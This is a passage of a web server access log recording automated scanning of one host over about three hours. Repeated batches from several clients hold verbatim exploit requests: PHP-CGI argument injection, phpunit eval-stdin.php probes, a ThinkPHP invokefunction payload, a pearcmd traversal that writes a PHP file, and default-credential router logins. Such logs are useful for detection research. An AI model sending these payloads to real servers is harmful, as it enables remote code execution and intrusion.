Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:21:07:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:21:22:20 +0000] 400 - GET http 91.82.83.208 "/" [Client 45.156.128.84] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[22/Jan/2026:21:22:30 +0000] 400 - POST http 91.82.83.208 "/mcp" [Client 45.156.128.81] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" +[22/Jan/2026:21:22:30 +0000] 400 - GET http 91.82.83.208 "/sse" [Client 45.156.128.81] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" +[22/Jan/2026:21:22:31 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 45.156.128.83] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[22/Jan/2026:21:25:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:22:17:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:20:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:31:50 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:36:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:38:36 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.61.134.40] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:22:38:37 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.61.134.40] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:22:38:37 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:38 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.61.134.40] [Length 154] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:38 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:39 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:39 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:40 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:40 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:40 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:40 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:41 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:41 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:42 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:42 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:42 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:42 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:43 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:44 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:44 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:45 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:46 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:46 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:47 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:48 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:48 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:49 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:50 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:51 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:52 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:52 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:52 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:53 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:54 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:55 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:55 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:56 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:56 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:57 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:58 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:58 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:58 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:38:59 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:39:00 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:39:01 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:39:02 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 45.61.134.40] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:40:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:45:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:22:59:39 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.242.189.254] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:22:59:40 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.242.189.254] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:22:59:40 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:41 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.242.189.254] [Length 154] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:41 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:42 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:42 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:43 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:43 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:44 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:45 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:45 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:46 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:46 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:47 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:47 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:48 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:49 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:49 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:50 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:51 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:51 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:51 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:52 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:52 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:53 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:53 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:54 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:54 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:55 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:55 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:56 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:56 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:57 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:57 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:58 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:58 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:59 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:22:59:59 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:00 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:00 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:01 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:01 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:02 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:02 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:00:03 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 190.242.189.254] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:23:01:45 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:08:09 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:09:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:09:41 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[22/Jan/2026:23:11:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:16:02 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[22/Jan/2026:23:18:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 94.72.146.30] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117." "-" +[22/Jan/2026:23:20:40 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:29:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:35:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:39:21 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=admin&psd=admin" [Client 139.5.0.10] [Length 150] [Gzip -] "-" "-" +[22/Jan/2026:23:45:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:52:48 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:23:54:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.154] [Length 0] [Gzip -] "-" "-" +[23/Jan/2026:00:01:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.62.197.137] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/135.0.0.0 Safari/537.36" "-" +[23/Jan/2026:00:03:05 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 64.62.197.137] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0" "-" +[23/Jan/2026:00:03:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:04:44 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:00:04:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:05:38 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 64.62.197.137] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/135.0.0.0 Safari/537.36" "-" +[23/Jan/2026:00:11:54 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:15:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:15:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 35.203.210.80] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[23/Jan/2026:00:21:04 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:00:22:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.130.57.76] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; 